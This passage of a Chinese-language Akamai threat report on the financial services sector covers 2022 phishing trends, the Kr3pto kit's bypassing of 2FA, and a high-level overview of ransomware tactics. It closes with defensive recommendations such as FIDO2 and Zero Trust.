50、在 2022 年第 1 季度和第 2 季度遭遇网络钓鱼诈骗滥用和冒充的品牌。为了精准跟踪网络钓鱼活动并分析其趋势与模式，我们根据受害者数量对这些诈骗进行了分类。图 20：2022 年第 2 季度网络钓鱼受害者按行业划分的网络钓鱼攻击垂直行业金融服务高科技媒体电子商务约会其他兵临城下：第 8 卷，第 3 期 SOTI26图 20 表明，在成为攻击目标的垂直行业中，金融服务业和高科技行业一直稳居榜首。我们也观察到，这两个季度的百分比分别从第 1 季度的 32%（金融服务业）和 31%（高科技行业）上升到第 2 季度的 47%（金融服务业）和 36%（高科技行业）。这些结论并不令人意外，但针对金融服

51、务业的网络钓鱼攻击数量呈现上升趋势，这仍然令人担忧。图 21：网络钓鱼攻击更多地针对消费者帐户，而非企业帐户大多数网络钓鱼攻击活动(80.7%)针对的是消费者帐户，而非企业帐户（参见图 21）。这种趋势是由黑市中对消费者被盗帐户的大量需求所推动的，这些帐户随后被用于发起与欺诈相关的第二阶段攻击。按目标划分的网络钓鱼攻击企业消费者Akamai 的研究表明，基于令牌的 2FA 解决方案远远无法做到万无一失，企业需要采用更强大的多因素保护机制。兵临城下：第 8 卷，第 3 期 SOTI27但是，即使攻击活动占比只有 19.3%，也不应认为对企业帐户的攻击微不足道，因为这些类型的攻击通常更有针对性，并

52、且具有更大的破坏潜力。针对企业帐户的攻击可能会导致公司网络受到恶意软件或勒索软件的破坏，或者机密信息泄露。始于员工单击网络钓鱼电子邮件中链接的攻击最终有可能导致企业遭受重大的财务和声誉损失。一个值得关注的例子是 Colonial Pipeline 网络攻击，攻击者先是入侵了一个 VPN 帐户，随后成功入侵了企业。虽然没有确切的方法来确认这次攻击得手的原因，但遭遇入侵的帐户所用的密码很有可能与据称在暗网上泄露的某个密码相同。兵临城下：第 8 卷，第 3 期 SOTI28网络钓鱼攻击能够绕过双重身份验证Akamai 安全研究团队还分析了 2022 年第 2 季度重复使用最多的工具包，统计用于交付各

53、工具包的不同域的数量。Kr3pto 工具包的使用频率最高，与 500 多个域相关联（参见 图 22）。图 22：Kr3pto 是 2022 年第 2 季度使用频率最高的网络钓鱼工具包，它具备绕过 2FA 的能力Kr3pto 幕后的攻击者构建并销售针对金融机构和其他品牌的独特工具包。在一些个例中，这些工具包针对的是英国的金融公司，并且具备绕过 2FA 的功能。该证据还表明，这个最初创建于三年多前的网络钓鱼工具包仍然高度有效，并且在现实环境中依然被频频使用。虽然 Kr3pto 等网络钓鱼活动并不新鲜，但与此类攻击有关的详情可以帮助我们了解网络钓鱼的市场力量，并重点展现与此类活动相关的规模和复杂性。

54、遭到盗用的目标凭据会导致他人实施欺诈活动或未经授权地访问安全网络，为了实现这些目的，攻击者会引入各种技术来绕过使用一次性密码令牌或推送通知的 2FA 解决方案。Akamai 的研究表明，基于令牌的 2FA 解决方案远远无法做到万无一失，企业需要采用更强大的多因素保护机制。例如，FIDO2 这一最新标准能提供更出色的安全性，它采用无密码机制，要求用户在访问网站或开展在线交易时通过本地身份验证（例如使用生物识别技术验证身份）。它不再需要任何用户名或密码，也就是说没有凭据，这让网络钓鱼攻击无下手之地。热门网络钓鱼工具包相关域的数量microsoft_530webmail_423kr3pto_tool

55、kit_32sfexpress_93fakegame_996mtbank_674bet365_424facebook_714microsoft_live_login_619microsoft_906兵临城下：第 8 卷，第 3 期 SOTI29恶意软件之路在本报告中，我们详细介绍了攻击者用于入侵金融服务业的各种战术和方法。本部分将简略介绍攻击者通过各种手段（新老漏洞、Web 应用程序和 API 攻击或网络钓鱼诈骗）成功入侵金融服务企业后，会发生些什么。在攻击者成功入侵企业网络之后，就能执行大量恶意活动，例如通过各种恶意软件（勒索软件等）破坏安全机制。金融服务业是一个安全防护程度极高的行业，但他

56、们遭受的攻击与日俱增，因此必须警惕相应风险。了解犯罪分子用来入侵企业的勒索软件现代 TTP 不失为精明之举，在 RaaS 与网络钓鱼攻击、漏洞扫描甚至是使用 DDoS 作为勒索攻击计划一环的恶意行为中，我们可以找到一些相符的原则。从获取初始访问到凭据搜集为实现其渗透网络并进行传播的目的，勒索软件团伙会利用各种工具，其中大多数都很出名，在行业中被广泛使用。事实上，通常似乎只有加密器（有时是木马病毒）才是他们自己的，在各个勒索软件团伙之间有所差别。但对横向移动、传播和渗透的 TTP，战线双方的人应该都很熟悉，例如 Cobalt Strike、Mimikatz 和 PSExec 等。对大多数勒索软件

57、来说，最常见的攻击媒介似乎都是网络钓鱼，这是指引诱用户打开一份用作攻击武器的文档或存档。当然也有其他一些常用的方法，例如通过“猜测”正确的凭据来攻击 VPN 或远程桌面协议(RDP)服务器。Conti 泄露的文档中提供了网络爬虫的设计文档，它们采用的感染方法就不是那么常见了（参见图 23）。图 23：勒索软件杀伤链横向移动在整个网络中传播，尽可能扩大覆盖面加密带有加密（以防止破解）的 PKI能牟利吗？渗漏式攻击寻找并窃取有价值的数据赎金通知壁纸和赎金 txt 文件初始立足点（针对性）网络钓鱼或存在漏洞的已暴露应用程序兵临城下：第 8 卷，第 3 期 SOTI30勒索软件还会使用常见横向移动技术

58、，在 MITRE 覆盖的网络中移动，如 WMI、远程计划任务、RDP、WinRM 和 PsExec，以及像 EternalBlue 和 BlueKeep 这样的零日漏洞。为了保住在网络中的立足点，Conti 团伙就使用了计划任务。他们泄露的手册还提到了其他一些持久驻留方法，如注册表运行键、Office 应用程序启动、Windows 服务等。在网络犯罪分子获得更高级别的权限后，下一步就是窃取帐户名称和密码。凭据搜集通常通过本地安全授权子系统服务(LSASS)或安全帐户管理器(SAM)数据库完成。这方面最常用的工具是 Mimikatz，但也有其他许多凭据转储实用程序。在此阶段，零日漏洞也是通过网络

59、获取凭据的关键。本部分提供了几个简短示例，展示了我们观察到的一些有待应对的趋势。勒索软件是最具破坏性的攻击之一，它会给客户造成损失，也会让任何企业因失去客户信任而蒙受损失。尽管勒索软件在金融行业内的普及程度不及其他行业，但仍然是一种必须密切跟踪、严加抵御的威胁媒介。若要进一步了解这些 TTP，请参阅我们的2022 年上半年 Akamai 勒索软件威胁报告。通过了解攻击面，您就能获得对关键风险的见解，进而制定安全控制措施和缓解计划。兵临城下：第 8 卷，第 3 期 SOTI3131SOTI总结：不断扩大的威胁面金融服务业在安全防护方面一直处于全球领先地位，但鉴于其拥有的机密数据的数量和性质，这个

60、行业依然是网络犯罪分子有利可图的目标。通过研究，我们得出了这样的结论：发现新漏洞时，金融服务业总是最先、最常受到攻击的行业之一，这个行业是 DDoS 攻击最趋之若鹜的目标，并且受到网络钓鱼攻击活动的持续关注，而金融服务业客户会首当其冲地受到网络钓鱼攻击的重创。攻击者总会设法渗透您的网络或影响您的客户。通过了解攻击面，您就能获得对关键风险的见解，进而制定安全控制措施和缓解计划。API 和 Web 应用程序攻击的转移和激增可帮助企业及其安全团队更好地了解攻击者所关注的方面，并相应地优先为潜在漏洞实施保护。此外，在涉及到新兴漏洞时，您应该认识到，可供您做出反应的时间非常短，这突显了采取主动措施（如补

61、丁程序管理）的重要性。我们的研究还强调，通过了解可能遭遇的攻击类型，企业就能妥善保护客户。此外，勒索软件等威胁可能会利用漏洞并使用大量工具和方法来入侵网络，所以不妨做好最坏的打算假设入侵已经发生。在本报告中，我们要提醒企业认真考虑自己是否具备适当的工具和流程，以降低勒索软件和其他威胁带来的风险。最后，最佳实践和流程（如网络击杀链、NIST 800-207 Zero Trust 架构和最新的 FIDO2 标准）都是金融服务业的宝贵资源。敬请访问我们的安全中心，随时了解我们的最新研究资讯。兵临城下：第 8 卷，第 3 期 SOTI32Akamai 支持并保护网络生活。全球各大优秀公司纷纷选择 Ak

62、amai 来打造并提供安全的数字化体验，为数十亿人每天的生活、工作和 娱乐提供助力。我们横跨云端和边缘的计算平台在全球广泛分布，不仅能让客户轻松开发和运行应用程序，而且还能让体验更贴近户，帮助用户远离威胁。如需详细了解 Akamai 的安全、计算及交付解决方案，请访问 和 二维码，关注我们的微信公众号。发布时间：2022 年 11 月。|33致谢名单编辑与创作Chen Doytshman Or Katz Eliad Kimhy Badette Tribbey 数据分析 Tom Emmons Robert Lester 营销与发布Georgina Morales Hampe Shivangi Sahu 更多互联网现状/安全性回顾往期报告，并关注 Akamai 备受好评的 互联网现状/安全性后续报告。 Akamai 威胁研究关注最新的威胁情报分析、安全报告和网络安全研究的动态。 Akamai 徽标。 Akamai 解决 方案 如需详细了解 Akamai 为抵御以金融服务业为目标的威胁提供的解决方案，请访问我们的“面向金融服务公司的 CDN 服务”网页。扫码关注获取最新CDN前沿资讯